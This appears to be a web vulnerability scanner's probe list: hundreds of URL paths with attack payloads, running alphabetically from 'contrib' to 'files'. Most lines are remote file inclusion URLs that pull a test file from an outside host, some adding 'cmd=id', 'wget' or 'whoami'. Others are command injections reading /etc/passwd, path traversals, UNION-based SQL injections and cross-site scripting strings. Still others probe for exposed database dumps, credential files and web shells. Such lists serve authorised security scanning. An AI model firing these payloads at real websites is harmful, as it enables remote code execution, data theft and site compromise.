contrib/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
contrib/extjs/resources//charts.swf
contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=http://www.yxlink.com/nvs_test.txt
contrib/mx_glance_sdesc.php?mx_root_path=http://www.yxlink.com/nvs_test.txt
contrib/phpBB2/modules.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
controller
controllers/MySQLController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/SQLController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/SetupController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/VideoController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/ViewController.php?baseDir=http://www.yxlink.com/nvs_test.txt
convert-date.php?cal_dir=http://www.yxlink.com/nvs_test.txt
convert/mvcw.php?step=1&vwar_root=http://www.yxlink.com/nvs_test.txt
convert/mvcw.php?vwar_root=http://www.yxlink.com/nvs_test.txt
core
core/admin/admin.php?p=admin&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/categories_add.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/categories_remove.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/editdel.php?p=admin&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/ftpfeature.php?p=admin&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/login.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/pgRSSnews.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/showcat.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/archive_cat.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/archive_nocat.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/aural.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt
core/aural.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?&cmd=dir
core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
core/editor.php?editor_insert_bottom=http://www.yxlink.com/nvs_test.txt
core/includes.php?CMS_ROOT=http://www.yxlink.com/nvs_test.txt?
core/includes/gfw_smarty.php?config[gfwroot]=shell.txt
core/recent_list.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/user.php?cs_cookies[customer_user_id]=1'/*;
coredumpcheck.php
coremail/XT3/main/intervalCheck.jsp?sid=111111111111111111</script><script>alert(123)</script>
corpo.php?pagina=http://www.yxlink.com/nvs_test.txt
counter/
cp
cp2.php?securelib=http://www.yxlink.com/nvs_test.txt
cpe/index.php?repertoire_config=http://www.yxlink.com/nvs_test.txt
cpqlogin.htm
cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE\x22; alert('XSS');//&contextid=DATABASECONTEXTHERE\x22; alert('XSS');//
crea.php?plancia=http://www.yxlink.com/nvs_test.txt
creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://www.yxlink.com/nvs_test.txt?
creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://www.yxlink.com/nvs_test.txt?
creat_news_all.php?language=http://www.yxlink.com/nvs_test.txt
create_file.php?target=http://www.yxlink.com/nvs_test.txt
create_file.php?target=http://www.yxlink.com/nvs_test.txt?
credentials.xml
credit/
crm
crm/
cron.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt
cron.php?include_path=http://www.yxlink.com/nvs_test.txt?
crontab/run_billing.php?config[include_dir]=http://www.yxlink.com/nvs_test.txt
cross.php?url=http://www.yxlink.com/nvs_test.txt
cross.php?url=http://www.yxlink.com/nvs_test.txt 
crossdomain.xml
csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
csv
customMBeans/customMBeans.jsf?');};alert(222);</script><!--
custom_vars.php?sys[path_addon]=http://www.yxlink.com/nvs_test.txt
customer
customer/product.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
customers
customers.csv
customers.log
customers.mdb
customers.sql
customers.sql.gz
customers.sqlite
customers.txt
customers.xls
customers/
customform/CustomFormJS.asp
customform/CustomFormJS.asp?CustomFormID=%27&FormStyleID=%27
cutenews/index.php?debug
cvs
cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cvslog.cgi?file=<script>alert('Vulnerable')</script>
cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cwb/comanda.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt?
cybershell.php
d
d.php
dabao.php
dama.php
dana-na/auth/rdremediate.cgi?delivery_mode=</APPLET><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>&action=tryagain&signinId=url_default
dana.php
dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
dansguardian/edit.cgi?file=/etc/passwd
dark.php
dat
data
data.mdb
data.sqlite
data/%23aspcms252.asp
data/admin/ver.txt
data/fetch.php?page=
data/mysql_error_trace.inc
data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php
database
database.7z
database.csv
database.inc
database.log
database.mdb
database.php
database.rar
database.sql
database.sql.gz
database.sql.tar
database.sqlite
database.tar
database.tar.gz
database.yml
database.yml.pgsql
database.yml.sqlite3
database.yml_original
database.yml~
database.zip
database_credentials.inc
databases.yml
datei.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
dav
day.php?query=CalendarDetailsID=-1) UNION SELECT md5(333),0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
db
db.7z
db.csv
db.inc
db.log
db.mdb
db.php?q='&t='
db.rar
db.sql
db.sql.gz
db.sql.tar
db.sqlite
db.tar
db.tar.gz
db.zip
db/
db/PollDB.php?CONFIG_DATAREADERWRITER=http://www.yxlink.com/nvs_test.txt?
db/main.php
db/mysql/db.inc.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
db1.mdb
db1.sqlite
db2
db4web_c/dbdirname//etc/passwd
dba4.nsf
dbaccess.log
dbadmin/
dbadmin/main.php
dbase
dbcommon/include.php?_APP_RELATIVE_PATH=http://www.yxlink.com/nvs_test.txt
dbdump.7z
dbdump.rar
dbdump.sql
dbdump.sql.gz
dbdump.sql.tar
dbdump.tar
dbdump.tar.gz
dbdump.zip
dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
dd.php
de
dead.letter
debug.inc
debug.log
debug.php
debug.txt
debug/dbg?host=<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title=<script>alert('Vulnerable');</script>
debug/showproc?proc=<script>alert('Vulnerable');</script>
debugger.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
decoder/gallery.php?ccms_library_path=http://www.yxlink.com/nvs_test.txt
decoder/markdown.php?ccms_library_path=http://www.yxlink.com/nvs_test.txt
default
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
defaults_setup.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?cmd=ls
defines.php?WEBCHATPATH=http://www.yxlink.com/nvs_test.txt
defines.php?WEBCHATPATH=http://www.yxlink.com/nvs_test.txt?
demo
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://www.yxlink.com/nvs_test.txt&
demo/ojspext/events/globals.jsa
demo/sql/index.jsp
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
denglu/
depouilg.php3?NomVote=http://www.yxlink.com/nvs_test.txt?
detail_zt.php?i=1&c=1%20anandd%20%201%20%20is%20%20false%20%20ununionion%20%20selselectect%20%201,username,3,4,id,userpassword,100000000000-35*250,8,9%20%20frfromom%20%20user_info
dev
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
devel
developer
developers
development.php?root_prefix=http://www.yxlink.com/nvs_test.txt
devels
dfcode.php?DFORUM_PATH=http://www.yxlink.com/nvs_test.txt?
dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.yxlink.com/nvs_test.txt?
dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.yxlink.com/nvs_test.txt?
dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.yxlink.com/nvs_test.txt
dialog.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
dialogs/a.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/collorpicker.php?spaw_dir=http://www.yxlink.com/nvs_test.txt&cmd=id
dialogs/img.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/img_library.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/table.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/td.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
diapo.php?rep=<script>alert(document.cookie)</script>
dic.php
digitaleye_Path/module.php?menu=http://www.yxlink.com/nvs_test.txt?
dir/prepend.php?_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
dir_thatware/config.php?root_path=http://www.yxlink.com/nvs_test.txt'
direct.php?rf=http://www.yxlink.com/nvs_test.txt
direction/index.php?repertoire_config=http://www.yxlink.com/nvs_test.txt
directory.php?dir=%3Bcat%20/etc/passwd
directory/index.php?path=http://www.yxlink.com/nvs_test.txt
dispatch.php?atknodetype=project.activity&atkaction=stats&activityid=0%20UNION%20SELECT%201,md5%28333%29,3,4
dispbbs.asp?boardID=8&ID=550194&page=1\x22><script>alert(333)</script>
dispbbs.php?boardid=2&id=1&page=1&setStmt=,title=(select%20md5(222)%20from%20dv_admin)
display.php?pag=http://www.yxlink.com/nvs_test.txt
display.php?path=http://www.yxlink.com/nvs_test.txt
displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
dispuser.asp?name=Walltrapass\x22><script>alert(333)</script>
dix.php3?url_phpartenaire=http://www.yxlink.com/nvs_test.txt
diy.php
dl
dm-albums/template/album.php?SECURITY_FILE=http://www.yxlink.com/nvs_test.txt
dm.php
dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(222)%3E%3Cfoo+
dms0
do/form.php?mid=3\x22><script>alert(2333)</script>
do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\x22Content-Type:text/html\x5Cr\x5Cn\x5Cr\x5Cn<Vulnerable!>\x22)%3bexit
do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.baidu.com%3E
doc
doc/11.00RelNotes
doc/11iRelNotes.html
doc/11iRelNotes.txt
doc/11iSRB.txt
doc/ASX-JPN
doc/ASX-JPN-E
doc/ASX-JPN-S
doc/ASX-KOR
doc/ASX-SCH
doc/ASX-TCH
doc/ASX-UTF8
doc/Judy/
doc/Judy/COPYRIGHT
doc/Judy/Judy1_3x.htm
doc/Judy/Judy1_funcs_3x.htm
doc/Judy/JudyL_3x.htm
doc/Judy/JudyL_funcs_3x.htm
doc/Judy/JudySL_3x.htm
doc/Judy/JudySL_funcs_3x.htm
doc/Judy/Judy_3x.htm
doc/Judy/LICENSE
doc/Judy/demo/
doc/Judy/demo/JudySort.c
doc/Judy/demo/Makefile
doc/Judy/demo/funhist.c
doc/Judy/demo/interSL.c
doc/LICENSE.SMAIL893
doc/NTP_Primer.txt
doc/PRINT-ASE-NOTE
doc/PRINTER-JPN-E
doc/PRINTER-JPN-S
doc/SETNETLP_Guide-E
doc/SETNETLP_Guide-S
doc/TechPrtServ/
doc/admin/index.php?ptinclude=http://www.yxlink.com/nvs_test.txt
doc/dir.perm.txt
doc/packages/
doc/rt/overview-summary.html
doc/sw_patches.txt
doc/vxvm/
doc/webmin.config.notes
doceboCore/lib/lib.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://www.yxlink.com/nvs_test.txt
docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
docs
docs/<script>alert('Vulnerable');</script>
docs/NED?action=retrieve&location=.
docs/front-end-demo/cart2.php?workdir=http://www.yxlink.com/nvs_test.txt?
docs/sdb/en/html/index.html
docs/showdoc.php?css=1>\x22><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt>
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\x5Cboot.ini
documents
dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://www.yxlink.com/nvs_test.txt?&cmd=wget%20XXpathXX
door.php
dose.pl?daily&somefile.txt&|ls|
dosearch.php?RESPATH=http://www.yxlink.com/nvs_test.txt
dotproject/modules/projectdesigner/gantt.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
down
down.asp?filename=../conn.asp%20
down/html/?88'.html
download
download.php?op=viewdownload
download.php?root_prefix=http://www.yxlink.com/nvs_test.txt
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
download/
download_engine_V1.4.3/addmember.php?eng_dir=http://www.yxlink.com/nvs_test.txt
download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=http://www.yxlink.com/nvs_test.txt
download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=http://www.yxlink.com/nvs_test.txt
downloads
downloads/
downloads/pafiledb.php?action=download&id=4?\x5C\x22&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\x5C\x22
downloads/pafiledb.php?action=email&id=4?\x5C\x22&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\x5C\x22
downloads/pafiledb.php?action=rate&id=4?\x5C\x22&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\x5C\x22
downstat1.8/chart.php?art=http://www.yxlink.com/nvs_test.txt?
dp_logs.php?HomeDir=http://www.yxlink.com/nvs_test.txt
dra.php
dswsbobje/services/listServices
dump
dump.7z
dump.rar
dump.sql
dump.sql.gz
dump.sql.tar
dump.tar
dump.tar.gz
dump.zip
dynamic/
e
e.php
e/class/checklevel.php?check_path=http://www.yxlink.com/nvs_test.txt
e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=\x22><script>alert(123)</script>
e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0Amd5(333),md5(333),md5(333),md5(333),md5(333),md5(333),md5(333)
e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,md5(333)
e107_config.php?cmd=id
eWebEditorNet/admin/login.aspx
eWebEditorNet/admin_login.aspx
eXPerience2/modules.php?file=http://www.yxlink.com/nvs_test.txt
ea-gBook/index_inc.php?inc_ordner=http://www.yxlink.com/nvs_test.txt?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
eccredit.php?action=list&uid=\x22><script>alert(111);</script>
edit
edit.php?javascript_path=http://www.yxlink.com/nvs_test.txt?
edit/admin_uploadfile.asp?id=&dir=../../.
edit_comment.aspx?id=48&amp;bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E
editor
editor.php?newsfile=http://www.yxlink.com/nvs_test.txt
editor/FCKeditor
editor/admin_login.asp
editor/admin_login.aspx
editor/admin_login.php
editor/eWebEditorNet/admin/login.aspx
editor/eWebEditorNet/admin_login.aspx
editor/login.asp
editor/login.aspx
editor/login.php
editor/stats/
editor/tiny_mce
editor/tinymce
editors/FCKeditor
editprofile.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
editsite.php?returnpath=http://www.yxlink.com/nvs_test.txt
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
editx/add_address.php?include_dir=http://www.yxlink.com/nvs_test.txt
efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>
ejs/%3Cscript%3Ealert%281%29%3C/script%3E
ekgnkm/AccessCodeStart.asp?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
elmah.axd
elseif/contenus.php?contenus=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/articles/usrarticles.php?corpsdesign=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/depot/usrdepot.php?corpsdesign=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/depot/usrdepot.php?corpsdesignhttp://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/votes.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
email.php?login=attacker&cer_skin=/etc/passwd
email_subscribe.php?root_prefix=http://www.yxlink.com/nvs_test.txt
emailfriend/emailarticle%20php?submit=submit&email&youremail=webmaster%20hackingzone%20org&id=100UNION%20select%20md5(333),email,password%20from%20mos_users%20where%20id=1
emailfriend/emailarticle.php?id=\x5C\x22<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\x5C\x22<script>alert(document.cookie)</script>
emailfriend/emailnews.php?id=\x5C\x22<script>alert(document.cookie)</script>
embed/day.php?path=http://www.yxlink.com/nvs_test.txt
empower?DB=whateverwhatever
en
enc/content.php?Home_Path=http://www.yxlink.com/nvs_test.txt?
engine/Ajax/editnews.php?root_dir=http://www.yxlink.com/nvs_test.txt
engine/api/api.class.php?dle_config_api=http://www.yxlink.com/nvs_test.txt?
engine/classes/swfupload//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
engine/classes/swfupload//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
engine/classes/swfupload//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
engine/engine.inc.php?absolute_path=http://www.yxlink.com/nvs_test.txt
engine/init.php?root_dir=http://www.yxlink.com/nvs_test.txt
engine/oldnews.inc.php?addpath=http://www.yxlink.com/nvs_test.txt
engine/require.php?MY_ENV[BASE_ENGINE_LOC]=http://www.yxlink.com/nvs_test.txt?
english
entete.php?subpath=http://www.yxlink.com/nvs_test.txt
enteteacceuil.php?subpath=@RFIUR
enth3/show_joined.php?path=http://www.yxlink.com/nvs_test.txt
environ.pl
environ.pl?param1=<script>alert(document.cookie)</script>
environment.php?DIR_PREFIX=http://www.yxlink.com/nvs_test.txt
environment.rb
epal/index.php?view=http://www.yxlink.com/nvs_test.txt?
erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
err
error
error-log
error.log
error.php?default_path=http://www.yxlink.com/nvs_test.txt
error.php?e=<script>(333)</script> .
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
error/HTTP_NOT_FOUND.html.var
error_log
error_log/
errorlog
errors
errors.log
errors.php?error=http://www.yxlink.com/nvs_test.txt
errors/configmode.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
errors/needinit.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
errors/reconfigure.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
errors/unconfigured.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
es_custom_menu.php?files_dir=http://www.yxlink.com/nvs_test.txt
es_desp.php?files_dir=http://www.yxlink.com/nvs_test.txt
es_offer.php?files_dir=http://www.yxlink.com/nvs_test.txt
eshop.pl/seite=;cat%20eshop.pl|
eshow.php?Config_rootdir=http://www.yxlink.com/nvs_test.txt
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
estateagent.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
esupport/admin/autoclose.php?subd=http://www.yxlink.com/nvs_test.txt?
etc
etc/passwd
eva/index.php3?aide=http://www.yxlink.com/nvs_test.txt
eva/index.php3?perso=http://www.yxlink.com/nvs_test.txt
eva/index.php?eva[caminho]=http://www.yxlink.com/nvs_test.txt
event.php?myevent_path=http://www.yxlink.com/nvs_test.txt
event_cal/module/embed/day.php?path=http://www.yxlink.com/nvs_test.txt
eventcal/mod_eventcal.php?lm_absolute_path=http://www.yxlink.com/nvs_test.txt
eventcal2.php.php?path_simpnews=http://www.yxlink.com/nvs_test.txt
events.php?nav_time=-1+UNION+ALL+SELECT+md5(333),md5(333),md5(333),md5(333),md5(333),md5(333),md5(333)+from+events--
eventscroller.php?path_simpnews=http://www.yxlink.com/nvs_test.txt
eventum/forgot_password.php?email=\x5C\x22><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\x5C\x22><script>alert(document.cookie)</script>
eweb/admin/login.asp
eweb/admin/login.aspx
eweb/admin/login.jsp
eweb/admin/login.php
eweb/admin_login.asp
eweb/admin_login.aspx
eweb/admin_login.jsp
eweb/admin_login.php
ewebeditor/admin/login.aspx
ewebeditor/admin/login.php
ewebeditor/admin_login.asp
ewebeditor/admin_login.aspx
ewebeditor/admin_login.php
ewebeditor/login.asp
example
example-view/templates/article.php?globals[content_dir]=http://www.yxlink.com/nvs_test.txt?
example-view/templates/dates_list.php?globals[content_dir]=http://www.yxlink.com/nvs_test.txt?
example-view/templates/root.php?globals[content_dir]=http://www.yxlink.com/nvs_test.txt?
example.php?site=http://www.yxlink.com/nvs_test.txt
example/gamedemo/inc.functions.php?projectPath=http://www.yxlink.com/nvs_test.txt?
exampleext/control/ManagePortalPages?parentPortalPageId=\x22><script>alert(222)</script>
examplefile.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
examples
examples/
examples/basic/servlet/HelloServlet
examples/context
examples/cookie
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/%252e%252e/%252e%252e/manager/html/
examples/jsp/cal/cal2.jsp?time=<script>alert(123)</script>
examples/jsp/index.html
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp??
examples/patExampleGen/bbcodeSource.php?example=http://www.yxlink.com/nvs_test.txt
examples/servlet/SnoopServlet
examples/servlet/TroubleShooter
examples/servlets/index.html
examples/servlets/servlet/SessionExample
examples/session
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
exception/include.php?_APP_RELATIVE_PATH=http://www.yxlink.com/nvs_test.txt
exchange
exchange/lib/AMPROPS.INC
exchange/lib/ATTACH.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
exchange/lib/logon.inc
exchange/root.asp?acs=anon
excite;IFS=\x5C\x22$\x5C\x22;/bin/cat /etc/passwd
exec/show/config/cr
export
extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yxlink.com/nvs_test.txt
externalredirect.php?url=\x22><script>alert(222)</script>
extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
extjs/resources//charts.swf
extmail/cgi/env.cgi
extmail/cgi/index.cgi?__mode=<script>alert(123)</script>
extras/mt.php?web_root=http://www.yxlink.com/nvs_test.txt
extras/poll/poll.php?file_newsportal=http://www.yxlink.com/nvs_test.txt
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
ezusermanager_pwd_forgott.php?ezUserManager_Path=http://www.yxlink.com/nvs_test.txt
f
f.php
f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,md5%28333%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20&result=20
faks.php
fantastico_fileslist.txt
faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28md5(333),0x27,md5(444)%29%20from%20information_schema.SCHEMATA%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
faq.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
faq.php?module_root_path=http://www.yxlink.com/nvs_test.txt
faq.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
faqman/index.php?op=view&t=518\x22><script>alert(333)</script>
faqmanager.cgi?toc=/etc/passwd%00
favicon.ico
faxsurvey?cat%20/etc/passwd
fcgi-bin/echo
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
fck
fckeditor
fckeditor/editor/dialog/fck_link.php?dirroot=http://www.yxlink.com/nvs_test.txt
fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=http://www.yxlink.com/nvs_test.txt
fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=http://www.yxlink.com/nvs_test.txt?&cmd=id
fcring.php?s_fuss=http://www.yxlink.com/nvs_test.txt
feed
feed.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
feed/index2.php?m=http://www.yxlink.com/nvs_test.txt
fetchmailprefs.php?actionID=fetchmail_prefs_save&fm_driver=imap&fm_id=zzz%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3Cx+y%3D%22&fm_protocol=pop3&fm_lmailbox=INBOX&save=Create
fi?/etc/passwd
file
file-that-is-not-real-2002.php3
fileadmin
filemanager
filemanager/filemanager_forms.php?lib_path=http://www.yxlink.com/nvs_test.txt
filemgmt/brokenfile.php?lid=17\x22><script>alert(333)</script>
filemgmt/singlefile.php?lid=17'
filemgmt/viewcat.php?cid='6
filemgmt/visit.php?lid=1'1'0
files
files/amazon-bestsellers.php?CarpPath=http://www.yxlink.com/nvs_test.txt
files/carprss.php?CarpPath=http://www.yxlink.com/nvs_test.txt
files/compose-attach.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/compose-menu.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/compose-new.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/compose-send.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-create.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-delete.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-empty.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-rename.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folders.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/login.php3?err=hack&BSX_HTXDIR=http://www.yxlink.com/nvs_test.txt
files/mainfile.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
files/mbox-list.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-delete.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-forward.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-header.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-print.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
